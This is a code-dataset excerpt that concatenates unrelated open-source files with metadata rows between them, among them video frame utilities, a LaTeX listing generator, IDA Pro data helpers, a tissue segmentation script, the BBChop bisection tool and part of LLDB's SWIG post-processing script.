self._nextColumn_n = 0
self._row_n += 1
##x Overloads |Whoami|.
def isGrid( self ): return True
##x Overloads |Whoami|.
def isLayout( self ): return True
| gpl-3.0 | 1,094,700,796,064,712,600 | 23.821429 | 72 | 0.587828 | false | 3.157205 | false | false | false |
googleinterns/deep-stabilization | dvs/warp/read_write.py | 1 | 3803 | import numpy as np
import cv2
import os
from PIL import Image, ImageDraw, ImageFont
import matplotlib.pyplot as plt
import ffmpeg
import json
import torch
def load_video(path, save_dir = None, resize = None, length = -1): # N x H x W x C
vidcap = cv2.VideoCapture(path)
fps = vidcap.get(cv2.CAP_PROP_FPS)
success,image = vidcap.read()
print(image.shape)
height, width, layers = image.shape
if resize is None:
size = (width,height)
elif type(resize) is int:
size = (width//resize,height//resize)
else:
size = resize
count = 0
frames = []
while success:
if resize is not None:
image = cv2.resize(image, size, interpolation = cv2.INTER_LINEAR)
if save_dir != None:
path = os.path.join(save_dir, "frame_" + str(count).zfill(4) + ".png")
cv2.imwrite(path, image)
frames.append(image)
success,image = vidcap.read()
count += 1
if length > 0 and count >= length:
break
print("Video length: ", len(frames))
return frames, fps, size
def video2frame(path, resize = None):
data_name = sorted(os.listdir(path))
for i in range(len(data_name)):
print(str(i+1)+" / " + str(len(data_name)))
data_folder = os.path.join(path, data_name[i])
print(data_folder)
files = os.listdir(data_folder)
for f in files:
if f[-4:] == ".mp4":
video_name = f
video_path = os.path.join(data_folder, video_name)
frame_folder = os.path.join(data_folder, "frames")
if not os.path.exists(frame_folder):
os.makedirs(frame_folder)
load_video(video_path, save_dir = frame_folder, resize=resize)
def video2frame_one_seq(path, save_dir = None, resize = None): # N x H x W x C
vidcap = cv2.VideoCapture(path)
fps = vidcap.get(cv2.CAP_PROP_FPS)
success,image = vidcap.read()
print(path)
print(image.shape)
height, width, layers = image.shape
if resize is None:
size = (width,height)
elif type(resize) is int:
size = (width//resize,height//resize)
else:
size = resize
count = 0
while success:
if resize is not None:
image = cv2.resize(image, size, interpolation = cv2.INTER_LINEAR)
if save_dir != None:
path = os.path.join(save_dir, "frame_" + str(count).zfill(5) + ".png")
cv2.imwrite(path, image)
success,image = vidcap.read()
count += 1
return fps, size
def save_video(path,frame_array, fps, size, losses = None, frame_number = False, writer = None):
if writer is None:
if path[-3:] == "mp4":
out = cv2.VideoWriter(path,cv2.VideoWriter_fourcc(*'mp4v'), fps, size)
else:
out = cv2.VideoWriter(path,cv2.VideoWriter_fourcc('M','J','P','G'), fps, size)
else:
out = writer
for i in range(len(frame_array)):
# writing to a image array
if frame_number:
frame_array[i] = draw_number(np.asarray(frame_array[i]), i)
if losses is not None:
frame_array[i] = draw_number(np.asarray(frame_array[i]), losses[i], x = 900, message = "Loss: ")
out.write(frame_array[i])
if writer is None:
out.release()
def draw_number(frame, num, x = 10, y = 10, message = "Frame: "):
image=Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
draw = ImageDraw.Draw(image)
font = ImageFont.truetype("./data/arial.ttf", 45)
message = message + str(num)
color = 'rgb(0, 0, 0)' # black color
draw.text((x, y), message, fill=color, font=font)
return cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
video2frame("./video", resize = 4) | apache-2.0 | 6,814,465,245,670,962,000 | 34.222222 | 108 | 0.58822 | false | 3.278448 | false | false | false |
RasmusWL/generate-lstlisting | outputter.py | 1 | 2053 | from classes import *
latexBegin = r'''
\newcommand{\includecodelang}[2]{\lstinputlisting[escapechar=, language=#2]{#1}}
\newcommand{\includecode}[1]{\lstinputlisting[escapechar=]{#1}}
'''
latexIncludeCode = "\\includecode{%s}"
latexIncludeCodeLang = "\\includecodelang{%s}{%s}"
latexFileHeading = "\\%s{%s\label{%s:%s}}"
latexFileHeadingNoLabel = "\\%s{%s}"
latexReplacements = {
'\t': '\\ ' * 4,
'&': '\\&',
'%': '\\%',
'$': '\\$',
'#': '\\#',
'_': '\\_',
'{': '\\{',
'}': '\\}',
'~': '\\textasciitilde ',
'^': '\\textasciicircum '
}
def escapeForLatex(text):
text = text.replace('\\', '\\textbackslash')
text = text.replace(' ', '\\ ')
text = text.replace('\\textbackslash', '\\textbackslash ')
for i, j in latexReplacements.items():
text = text.replace(i, j)
text = text.replace('"', '\char`\"{}')
return text
def output_start(out_file):
out_file.write(latexBegin)
def output(filename, rel_path, out_file):
out_file.write("%" * 80)
out_file.write("\n")
out_file.write("%% %s\n\n" % rel_path)
if settings.shouldAddLabel:
# apparently, no escape in labels
heading = latexFileHeading % (settings.headingStyle, escapeForLatex(rel_path), settings.labelPrefix, rel_path)
else:
heading = latexFileHeadingNoLabel % (settings.headingStyle, escapeForLatex(rel_path) )
out_file.write(heading)
out_file.write("\n")
language = None
for key in fileExtensionMap:
if filename.endswith(key):
language = fileExtensionMap[key]
break
if language is None:
include_line = latexIncludeCode % (filename)
else:
include_line = latexIncludeCodeLang % (filename, language)
out_file.write(include_line)
out_file.write("\n")
out_file.write("\n")
fileExtensionMap = {
'.erl' : 'erlang'
, '.hs' : 'Haskell'
, '.py' : 'Python'
, '.java' : 'Java'
, '.sh' : 'sh'
, '.bash' : 'bash'
, '.sml' : 'ML'
, '.sig' : 'ML'
}
| mit | 2,184,732,010,869,205,800 | 23.152941 | 118 | 0.566001 | false | 3.217868 | false | false | false |
rishubil/sqlalchemy-fulltext-search | setup.py | 1 | 1279 | """
SQLAlchemy FullText Search
"""
from setuptools import setup, Command
setup(
name='SQLAlchemy-FullText-Search',
version='0.2.3',
url='https://github.com/mengzhuo/sqlalchemy-fulltext-search',
license='BSD',
author='Meng Zhuo, Alejandro Mesa',
author_email='[email protected], [email protected]',
description=('Provide FullText for MYSQL & SQLAlchemy model'),
long_description = __doc__,
packages=['sqlalchemy_fulltext'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=['SQLAlchemy>=0.8',],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules' ]
)
| mit | -265,112,061,610,332,200 | 38.96875 | 99 | 0.52932 | false | 4.702206 | false | false | false |
hazybluedot/manager_review | util.py | 1 | 1200 | def num_or_string(value):
try:
return float(value)
except ValueError:
return value
def num_or_none(fn, value):
try:
return fn(value)
except ValueError:
return None
def flatten_list(l):
return [ item for sublist in l for item in sublist ] # flatten list of lists
def issumable(thing):
try:
1.0 + thing
except TypeError:
return False
else:
return True
def label_to_attr(string):
return string.lower().replace(' ','_')
def levenshtein(s1, s2):
if len(s1) < len(s2):
return levenshtein(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
| gpl-2.0 | 2,454,069,128,475,677,000 | 25.666667 | 127 | 0.5775 | false | 3.399433 | false | false | false |
OfficialMan/Sark | sark/data.py | 1 | 2198 | from collections import namedtuple
import idc
import idaapi
import itertools
import struct
from awesome.iterator import irange as range
from .core import fix_addresses
def Bytes(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Byte, range(start, end))
def Words(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Word, range(start, end, 2))
def Dwords(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Dword, range(start, end, 4))
def Qwords(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Qword, range(start, end, 4))
def bytes_until(byte=0, start=None, end=None):
return iter(Bytes(start, end).next, byte)
def words_until(word=0, start=None, end=None):
return iter(Words(start, end).next, word)
def dwords_until(dword=0, start=None, end=None):
return iter(Dwords(start, end).next, dword)
def Chars(start=None, end=None):
return itertools.imap(chr, Bytes(start, end))
def chars_until(char='\0', start=None, end=None):
return iter(Chars(start, end).next, char)
def read_ascii_string(ea, max_length=None):
if max_length is None:
end = None
else:
end = ea + max_length
return "".join(chars_until(start=ea, end=end))
def dword_to_bytes(dword):
return struct.pack(">L", dword)
def read_memory(start, end):
size = end - start
return idaapi.get_many_bytes(start, size)
def write_memory(start, data, destructive=False):
if destructive:
idaapi.put_many_bytes(start, data)
else:
idaapi.patch_many_bytes(start, data)
PatchedByte = namedtuple("PatchedByte", "ea fpos original patched")
def get_patched_bytes(start=None, end=None):
start, end = fix_addresses(start, end)
patched_bytes = dict()
def collector(ea, fpos, original, patched):
patched_bytes[ea] = PatchedByte(ea, fpos, original, patched)
return 0
idaapi.visit_patched_bytes(start, end, collector)
return patched_bytes
def undefine(start, end):
idc.MakeUnknown(start, end - start, idc.DOUNK_SIMPLE) | mit | 8,412,659,711,819,700,000 | 21.438776 | 68 | 0.682439 | false | 3.131054 | false | false | false |
ri23/FISHmodel | 3Dseg.py | 1 | 6210 | """Segment 3D tissue without cell walls."""
import os
import argparse
import numpy as np
import scipy.ndimage
import scipy.misc
from scipy.ndimage.filters import laplace
from skimage.exposure import equalize_hist
from skimage.filters import gaussian_filter
from skimage.measure import label
from skimage.morphology import watershed, remove_small_objects
from jicbioimage.core.io import FileBackend
from jicbioimage.core.image import DataManager
from jicbioimage.core.image import SegmentedImage
from jicbioimage.transform import (
max_intensity_projection
)
from jicbioimage.illustrate import AnnotatedImage
HERE = os.path.dirname(__file__)
UNPACK = os.path.join(HERE, '..', 'data', 'unpack')
OUTPUT = os.path.join(HERE, '..', 'output')#'/group-share','ietswaar','test','output')#HERE, '..', 'output') RI edit 1
if not os.path.isdir(OUTPUT):
os.mkdir(OUTPUT)
DEBUG = False
def collection_from_filename(stack_filename):
file_backend = FileBackend(UNPACK)
data_manager = DataManager(file_backend)
microscopy_collection = data_manager.load(stack_filename)
return microscopy_collection
def save_sample(filename, stack, sample_z=25):
full_path = os.path.join(OUTPUT, filename)
if DEBUG:
scipy.misc.imsave(full_path, stack[:,:,sample_z])
def save_stack(stack, stack_name='stack'):
if not DEBUG:
return
stack_dir = os.path.join(OUTPUT, stack_name + '.stack')
if not os.path.isdir(stack_dir):
os.mkdir(stack_dir)
xdim, ydim, zdim = stack.shape
for z in range(zdim):
filename = 'z{}.png'.format(z)
full_name = os.path.join(stack_dir, filename)
scipy.misc.imsave(full_name, stack[:,:,z])
def blank_layers(input_array, n_layers=2, blank=1):
"""Return a copy of the input array with the top and bottom
n_layers set to a particular value."""
_, _, zdim = input_array.shape
start_z = n_layers
stop_z = zdim - n_layers
blanked = input_array.copy()
blanked[:,:,0:start_z] = blank
blanked[:,:,stop_z:] = blank
return blanked
def find_seeds(zstack):
"""Return array containing segmentation seeds."""
smooth_sigma = 10
seed_threshold = 0.13
min_size = 40000#10000 RI edit 5
xdim, ydim, zdim = zstack.shape
save_sample('start.png', zstack)
smoothed = gaussian_filter(zstack, sigma=smooth_sigma)
save_sample('smoothed.png', smoothed)
edges = laplace(smoothed)
edges = edges + np.min(edges)
save_sample('laplace.png', edges)
equalised = equalize_hist(edges)
save_sample('equalised.png', equalised)
blanked = blank_layers(equalised)
thresholded = blanked < seed_threshold
save_sample('thresholded.png', thresholded)
save_stack(thresholded, 'thresh')
connected = label(thresholded)
save_sample('connected.png', connected)
save_stack(connected, 'connected')
#rids = np.unique(connected)
#print [len(np.where(connected==rid)[0]) for rid in rids[1:]]
filtered_connected = remove_small_objects(connected, min_size=min_size)
save_stack(filtered_connected, 'filtered_connected')
return filtered_connected
def segment_from_seeds(zstack, seeds, watershed_cutoff):
smooth_sigma =5 #15 RI edit 4
size_threshold = 10000
smoothed2 = scipy.ndimage.filters.gaussian_filter(zstack,
sigma=smooth_sigma)
save_sample('smoothed2.png', smoothed2)
inverted = np.max(smoothed2) - smoothed2
save_sample('inverted.png', inverted)
# Now normalised
equalised2 = equalize_hist(inverted)
save_sample('equalised2.png', equalised2)
save_stack(equalised2, 'equalised')
mask = equalised2 < watershed_cutoff
save_sample('mask.png', mask)
segmented = watershed(equalised2, seeds, mask=mask)
save_sample('segmented.png', segmented)
save_stack(segmented, 'segmented')
# region_ids = np.unique(segmented)
# sizes = [len(np.where(segmented == rid)[0]) for rid in region_ids]
nosmall = remove_small_objects(segmented, min_size=size_threshold)
save_stack(nosmall, 'nosmall')
reseg = watershed(equalised2, nosmall, mask=mask)
save_stack(reseg, 'reseg')
return reseg
def uint8ify(input_array):
max_val = float(np.max(input_array))
min_val = float(np.min(input_array))
val_range = max_val - min_val
return 255 * ((input_array.astype(np.float) - min_val) / val_range)
def generate_annotated_image(collection, cell_level_threshold):
zstack = collection.zstack_array(s=0, c=2)
probe_stack = collection.zstack_array(s=0, c=0)
max_intensity_projection(probe_stack)
seeds = find_seeds(zstack)
#probe_stack2 = collection.zstack_array(s=0, c=1) #RI edit 2
zstack = zstack + probe_stack #+ probe_stack2#RI edit 3
segmentation = segment_from_seeds(zstack, seeds, cell_level_threshold)
projection = max_intensity_projection(zstack)
projection_as_uint8 = uint8ify(projection)
annotated_projection = AnnotatedImage.from_grayscale(projection_as_uint8)
rids = np.unique(segmentation)
for rid in rids[1:]:
x, y, z = map(np.mean, np.where(segmentation == rid))
size = len(np.where(segmentation == rid)[0])
annotated_projection.text_at(str(size), y-10, x)
annotation_filename = 'annotated_image.png'
with open(annotation_filename, 'wb') as f:
f.write(annotated_projection.png())
def main():
global DEBUG
parser = argparse.ArgumentParser(__doc__)
parser.add_argument('image_filename', help="Image filename")
parser.add_argument('--cell-level-threshold',
type=float,
default=0.3,
help="Threshold (in range 0 < t < 1) defining cell")
parser.add_argument('--verbose',
type=bool,
default=False,
help="Whether processing stages should be output")
args = parser.parse_args()
DEBUG = args.verbose
collection = collection_from_filename(args.image_filename)
generate_annotated_image(collection, args.cell_level_threshold)
if __name__ == "__main__":
main()
| mit | -6,816,007,855,000,496,000 | 27.356164 | 118 | 0.663768 | false | 3.430939 | false | false | false |
petebachant/actuatorLine-2D-turbinesFoam | plot.py | 1 | 1090 | #!/usr/bin/env python
"""
This script plots results from `paramsweep.py`.
"""
from __future__ import division, print_function
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
import seaborn as sns
U_infty = 1.0
if __name__ == "__main__":
sns.set(style="white", context="paper", font_scale=1.5,
rc={"axes.grid": True, "legend.frameon": True})
df = pd.read_csv("processed/alpha_sweep.csv")
fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(7.5, 3))
ax1.plot(df.alpha_geom_deg, df.alpha_deg, "o", label="Detected")
ax1.plot(df.alpha_geom_deg, df.alpha_geom_deg, "--", label="Geometric")
ax1.set_xlabel(r"$\alpha$ (geometric, degrees)")
ax1.set_ylabel(r"$\alpha$ (detected, degrees)")
ax1.legend(loc="lower right")
ax2.plot(df.alpha_deg, df.rel_vel_mag, "o", label="Detected")
ax2.plot(df.alpha_geom_deg, np.ones(len(df)), "--", label="Geometric",
lw=2)
ax2.set_xlabel(r"$\alpha$ (detected, degrees)")
ax2.set_ylabel(r"$|U_\mathrm{rel}|$")
fig.tight_layout()
plt.show()
| mit | -2,037,779,283,774,665,700 | 34.16129 | 75 | 0.631193 | false | 2.809278 | false | true | false |
unapiedra/BBChop | BBChop/BBChop.py | 1 | 6208 | # Copyright 2008 Ealdwulf Wuffinga
# This file is part of BBChop.
#
# BBChop is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# BBChop is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BBChop. If not, see <http://www.gnu.org/licenses/>.
from .listUtils import *
from .evidence import entropiesFast
from . import numberType
import copy
from . import skipProbability
#import plot
debug=False
#debug=True
############ ABBREVIATIONS
#
#
# E : Evidence
# L : Location
# d : number of detections at location
# t : number of non-detections at location
#
#
#stratgies
# greedy strategy: always choose the location where the expected gain in entropy
# for the next observation is highest, ie, the expected entropy after the
#next observation is smallest.
def greedyStrat(counts,locPrior,likelihoodsObj,dag,skipProbs):
(currEntropy,entropyResults,findProbs)=entropiesFast(counts,locPrior,likelihoodsObj,dag)
# test where expected entropy is smallest
expectedGain = [(currEntropy-entropyResults[i])*(numberType.one-skipProbs[i]) for
i in range(len(entropyResults))]
(next,nextp)=findMax(expectedGain)
return next
# nearly greedy strategy: like greedy, but if we have a detection, see if observinf there again
# would be expected to improve next gain in entropy.
def nearlyGreedyStrat(counts,locPrior,likelihoodsObj,dag,skipProbs):
dlocs=[i for i in range(len(counts)) if counts[i][1]]
(currEntropy,entropyResults,findProbs)=entropiesFast(counts,locPrior,likelihoodsObj,dag)
(next,nextE)=findMin(entropyResults)
if len(dlocs):
# if there is a detection, calculate the expected entropy after making another observation
# there and then making a 'greedy' observation.
dloc=dlocs[-1]
(t,d)=counts[dloc]
dcounts=copy.copy(counts)
tcounts=copy.copy(counts)
dcounts[dloc]=(t,d+1)
tcounts[dloc]=(t+1,d)
(currEntropyD,entropyResultsD,findProbsD)=entropiesFast(dcounts,locPrior,likelihoodsObj,dag)
(currEntropyT,entropyResultsT,findProbsT)=entropiesFast(tcounts,locPrior,likelihoodsObj,dag)
(nextD,nextED)=findMin(entropyResultsD)
(nextT,nextET)=findMin(entropyResultsT)
expectedEntropy=findProbs[dloc]*nextED+(1-findProbs[dloc])*nextET
# print "c %1.2f n %1.02f c-n %1.04f c-e %1.04f fp %1.02f nf %1.02f nt %1.02f" %(currEntropy,nextE,currEntropy-nextE,currEntropy-expectedEntropy,findProbs[dloc],nextED,nextET)
if (currEntropy-nextE)<(currEntropy-expectedEntropy)/2.0:
return dloc
else:
return next
else:
return next
class BBChop:
def __init__(self,
locPrior,
certainty,
interactor,
likelihoodsObj,
dag,
strategy=greedyStrat,
skipProbsFunc=skipProbability.skipProbsSimple):
self.locPrior=numberType.copyList(locPrior)
self.certainty=numberType.const(certainty)
self.counts=[(0,0) for p in locPrior]
self.skipProbsFunc=skipProbsFunc
self.skipped=[False for p in locPrior]
self.dag=dag
self.skipProbs = self.skipProbsFunc(self.skipped,self.dag)
self.interactor=interactor
self.total=0
self.likelihoodsObj=likelihoodsObj
self.strategy=strategy
def addPriorKnowlege(self,knowlege):
(positives,negatives)=knowlege
(t,d)=self.counts[-1]
t+=negatives
d+=positives
self.counts[-1]=(t,d)
def addResult(self,location,observation):
(t,d)=self.counts[location]
# 'None' means we've decided that this location is invalid (eg, won't compile)
if observation is None:
self.skipped[location]=True
# set prior to zero because otherwise termination probability
# cannot always be achieved. This means that
# the probabilities we calculate are conditional on the bug not being located
# at a skipped location.
self.locPrior[location]=numberType.zero
self.skipProbs = self.skipProbsFunc(self.skipped,self.dag)
elif observation is True:
self.counts[location]=(t,d+1)
else:
self.counts[location]=(t+1,d)
if debug:
print(("ct",self.counts))
def search(self):
(locProbs,evProb)=self.likelihoodsObj.probs(self.counts,self.locPrior,self.dag)
(whereabouts,maxp) = findMax(locProbs)
if debug:
print("lp",list(map(float,locProbs)))
print("ct",self.counts)
while(maxp<self.certainty):
#decide where to seach next
self.interactor.statusCallback(False,whereabouts,maxp,locProbs,self.counts)
next=self.strategy(self.counts,
self.locPrior,
self.likelihoodsObj,
self.dag,
self.skipProbs)
observation=self.interactor.test(next)
self.total+=1
# update evidence
self.addResult(next,observation)
(locProbs,evProb)=self.likelihoodsObj.probs(self.counts,self.locPrior,self.dag)
print(locProbs)
if debug:
print("lp",list(map(float,locProbs)))
print("e",float(entropy(locProbs)),list(map(float,entropyResults)))
print("fp",list(map(float,findProbs)))
(whereabouts,maxp) = findMax(locProbs)
self.interactor.statusCallback(True,whereabouts,maxp,locProbs,self.counts)
return whereabouts
| gpl-2.0 | -4,055,131,030,520,003,000 | 31.673684 | 182 | 0.643686 | false | 3.590515 | false | false | false |
fiji370/ostentatious-palaverer | bot_prototype 2.0/convert.py | 1 | 3005 | __all__ = ['convert']
# Don't look below, you will not understand this Python code :) I don't.
from js2py.pyjs import *
# setting scope
var = Scope( JS_BUILTINS )
set_global_object(var)
# Code follows:
var.registers([u'a', u'feach', u'g', u'checnum', u'n', u'Magnitude', u'text2num', u'Small'])
@Js
def PyJsHoisted_feach_(w, this, arguments, var=var):
var = Scope({u'this':this, u'arguments':arguments, u'w':w}, var)
var.registers([u'x', u'w'])
var.put(u'x', var.get(u'Small').get(var.get(u'w')))
if (var.get(u'x')!=var.get(u"null")):
var.put(u'g', (var.get(u'g')+var.get(u'x')))
else:
if (var.get(u'w')==Js(u'hundred')):
var.put(u'g', (var.get(u'g')*Js(100.0)))
else:
var.put(u'x', var.get(u'Magnitude').get(var.get(u'w')))
if (var.get(u'x')!=var.get(u"null")):
var.put(u'n', (var.get(u'n')+(var.get(u'g')*var.get(u'x'))))
var.put(u'g', Js(0.0))
else:
pass
PyJsHoisted_feach_.func_name = u'feach'
var.put(u'feach', PyJsHoisted_feach_)
@Js
def PyJsHoisted_checnum_(PyJsArg_6173_, this, arguments, var=var):
var = Scope({u'this':this, u'as':PyJsArg_6173_, u'arguments':arguments}, var)
var.registers([u'a', u'as'])
var.put(u'a', var.get(u'as').get(u'value'))
var.get(u'as').put(u'value', var.get(u'a').callprop(u'replace', JsRegExp(u'/[^\\d.]/g'), Js(u'')))
PyJsHoisted_checnum_.func_name = u'checnum'
var.put(u'checnum', PyJsHoisted_checnum_)
@Js
def PyJsHoisted_text2num_(s, this, arguments, var=var):
var = Scope({u'this':this, u's':s, u'arguments':arguments}, var)
var.registers([u's'])
var.put(u'a', var.get(u's').callprop(u'toString').callprop(u'split', JsRegExp(u'/[\\s-]+/')))
var.put(u'n', Js(0.0))
var.put(u'g', Js(0.0))
var.get(u'a').callprop(u'forEach', var.get(u'feach'))
return (var.get(u'n')+var.get(u'g'))
PyJsHoisted_text2num_.func_name = u'text2num'
var.put(u'text2num', PyJsHoisted_text2num_)
PyJs_Object_0_ = Js({u'zero':Js(0.0),u'one':Js(1.0),u'two':Js(2.0),u'three':Js(3.0),u'four':Js(4.0),u'five':Js(5.0),u'six':Js(6.0),u'seven':Js(7.0),u'eight':Js(8.0),u'nine':Js(9.0),u'ten':Js(10.0),u'eleven':Js(11.0),u'twelve':Js(12.0),u'thirteen':Js(13.0),u'fourteen':Js(14.0),u'fifteen':Js(15.0),u'sixteen':Js(16.0),u'seventeen':Js(17.0),u'eighteen':Js(18.0),u'nineteen':Js(19.0),u'twenty':Js(20.0),u'thirty':Js(30.0),u'forty':Js(40.0),u'fifty':Js(50.0),u'sixty':Js(60.0),u'seventy':Js(70.0),u'eighty':Js(80.0),u'ninety':Js(90.0)})
var.put(u'Small', PyJs_Object_0_)
PyJs_Object_1_ = Js({u'thousand':Js(1000.0),u'million':Js(1000000.0),u'billion':Js(1000000000.0),u'trillion':Js(1000000000000.0),u'quadrillion':Js(1000000000000000.0),u'quintillion':Js(1e+18),u'sexillion':Js(1e+21),u'septillion':Js(1e+24),u'octillion':Js(1e+27),u'nonillion':Js(1e+30),u'decillion':Js(1e+33)})
var.put(u'Magnitude', PyJs_Object_1_)
pass
pass
pass
pass
pass
pass
pass
# Add lib to the module scope
convert = var.to_python() | gpl-3.0 | 3,958,432,273,705,937,000 | 45.96875 | 532 | 0.610982 | false | 2.195033 | false | false | false |
llvm-mirror/lldb | scripts/Python/finishSwigPythonLLDB.py | 3 | 13786 | """ Python SWIG post process script for each language
--------------------------------------------------------------------------
File: finishSwigPythonLLDB.py
Overview: Python script(s) to post process SWIG Python C++ Script
Bridge wrapper code on the Windows/LINUX/OSX platform.
The Python scripts are equivalent to the shell script (.sh)
files.
For the Python script interpreter (external to liblldb) to
be able to import and use the lldb module, there must be
two files, lldb.py and _lldb.so, that it can find. lldb.py
is generated by SWIG at the same time it generates the C++
file. _lldb.so is actually a symlink file that points to
the LLDB shared library/framework.
The Python script interpreter needs to be able to
automatically find these two files. On Darwin systems it
searches in the LLDB.framework, as well as in all the normal
Python search paths. On non-Darwin systems these files will
need to be put some place where Python will find them.
This shell script creates the _lldb.so symlink in the
appropriate place, and copies the lldb.py (and
embedded_interpreter.py) file to the correct directory.
Gotchas: Python debug complied pythonXX_d.lib is required for SWIG
to build correct LLDBWrapperPython.cpp in order for Visual
Studio to compile successfully. The release version of the
Python lib will not work (20/12/2013).
LLDB (dir) CMakeLists.txt uses windows environmental
variables $PYTHON_INCLUDE and $PYTHON_LIB to locate
Python files required for the build.
Copyright: None.
--------------------------------------------------------------------------
"""
# Python modules:
import os # Provide directory and file handling, determine OS information
import sys # System specific parameters and functions
import shutil # High-level operations on files and collections of files
import ctypes # Invoke Windows API for creating symlinks
# Third party modules:
# In-house modules:
import utilsOsType # Determine the OS type this script is running on
import utilsDebug # Debug Python scripts
# User facing text:
strMsgOsVersion = "The current OS is %s"
strMsgPyVersion = "The Python version is %d.%d"
strErrMsgProgFail = "Program failure: "
strErrMsgLLDBPyFileNotNotFound = "Unable to locate lldb.py at path '%s'"
strMsgCopyLLDBPy = "Copying lldb.py from '%s' to '%s'"
strErrMsgFrameWkPyDirNotExist = "Unable to find the LLDB.framework directory '%s'"
strMsgCreatePyPkgCopyPkgFile = "create_py_pkg: Copied file '%s' to folder '%s'"
strMsgCreatePyPkgInitFile = "create_py_pkg: Creating pakage init file '%s'"
strMsgCreatePyPkgMkDir = "create_py_pkg: Created folder '%s'"
strMsgConfigBuildDir = "Configuration build directory located at '%s'"
strMsgFoundLldbFrameWkDir = "Found '%s'"
strMsgPyFileLocatedHere = "Python file will be put in '%s'"
strMsgFrameWkPyExists = "Python output folder '%s' already exists"
strMsgFrameWkPyMkDir = "Python output folder '%s' will be created"
strErrMsgCreateFrmWkPyDirFailed = "Unable to create directory '%s' error: %s"
strMsgSymlinkExists = "Symlink for '%s' already exists"
strMsgSymlinkMk = "Creating symlink for %s (%s -> %s)"
strErrMsgCpLldbpy = "copying lldb to lldb package directory"
strErrMsgCreatePyPkgMissingSlash = "Parameter 3 fn create_py_pkg() missing slash"
strErrMsgMkLinkExecute = "Command mklink failed: %s"
strErrMsgMakeSymlink = "creating symbolic link"
strErrMsgUnexpected = "Unexpected error: %s"
strMsgCopySixPy = "Copying six.py from '%s' to '%s'"
strErrMsgCopySixPyFailed = "Unable to copy '%s' to '%s'"
#++---------------------------------------------------------------------------
# Details: Create Python packages and Python __init__ files.
# Args: vDictArgs - (R) Program input parameters.
# vstrFrameworkPythonDir - (R) Python framework directory.
# vstrPkgDir - (R) Destination for copied Python files.
# vListPkgFiles - (R) List of source Python files.
# Returns: Bool - True = function success, False = failure.
# Str - Error description on task failure.
# Throws: None.
#--
def create_py_pkg(
vDictArgs,
vstrFrameworkPythonDir,
vstrPkgDir,
vListPkgFiles):
dbg = utilsDebug.CDebugFnVerbose("Python script create_py_pkg()")
dbg.dump_object("Package file(s):", vListPkgFiles)
bDbg = "-d" in vDictArgs
bOk = True
strMsg = ""
if vstrPkgDir.__len__() != 0 and vstrPkgDir[0] != "/":
bOk = False
strMsg = strErrMsgCreatePyPkgMissingSlash
return (bOk, strMsg)
strPkgName = vstrPkgDir
strPkgName = "lldb" + strPkgName.replace("/", ".")
strPkgDir = vstrFrameworkPythonDir
strPkgDir += vstrPkgDir
strPkgDir = os.path.normcase(strPkgDir)
if not(os.path.exists(strPkgDir) and os.path.isdir(strPkgDir)):
if bDbg:
print((strMsgCreatePyPkgMkDir % strPkgDir))
os.makedirs(strPkgDir)
for strPkgFile in vListPkgFiles:
if os.path.exists(strPkgFile) and os.path.isfile(strPkgFile):
if bDbg:
print((strMsgCreatePyPkgCopyPkgFile % (strPkgFile, strPkgDir)))
shutil.copy(strPkgFile, strPkgDir)
# Create a packet init files if there wasn't one
strPkgIniFile = os.path.normpath(os.path.join(strPkgDir, "__init__.py"))
if os.path.exists(strPkgIniFile) and os.path.isfile(strPkgIniFile):
return (bOk, strMsg)
strPyScript = "__all__ = ["
strDelimiter = ""
for strPkgFile in vListPkgFiles:
if os.path.exists(strPkgFile) and os.path.isfile(strPkgFile):
strBaseName = os.path.basename(strPkgFile)
nPos = strBaseName.find(".")
if nPos != -1:
strBaseName = strBaseName[0: nPos]
strPyScript += "%s\"%s\"" % (strDelimiter, strBaseName)
strDelimiter = ","
strPyScript += "]\n"
strPyScript += "for x in __all__:\n"
strPyScript += "\t__import__('%s.' + x)" % strPkgName
if bDbg:
print((strMsgCreatePyPkgInitFile % strPkgIniFile))
file = open(strPkgIniFile, "w")
file.write(strPyScript)
file.close()
return (bOk, strMsg)
#++---------------------------------------------------------------------------
# Details: Retrieve the directory path for Python's dist_packages/
# site_package folder depending on the type of OS platform being
# used.
# Args: vDictArgs - (R) Program input parameters.
# Returns: Bool - True = function success, False = failure.
# Str - Python Framework directory path.
# strErrMsg - Error description on task failure.
# Throws: None.
#--
def get_framework_python_dir(vDictArgs):
dbg = utilsDebug.CDebugFnVerbose(
"Python script get_framework_python_dir()")
bOk = True
strErrMsg = ""
strWkDir = os.path.normpath(vDictArgs["--lldbPythonPath"])
return (bOk, strWkDir, strErrMsg)
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
""" Details: Program main entry point fn. Called by another Python script.
--------------------------------------------------------------------------
Details: This script is to be called by another Python script. It is not
intended to be called directly i.e from the command line.
Args: vDictArgs - (R) Map of parameter names to values.
-d (optional) Determines whether or not this script
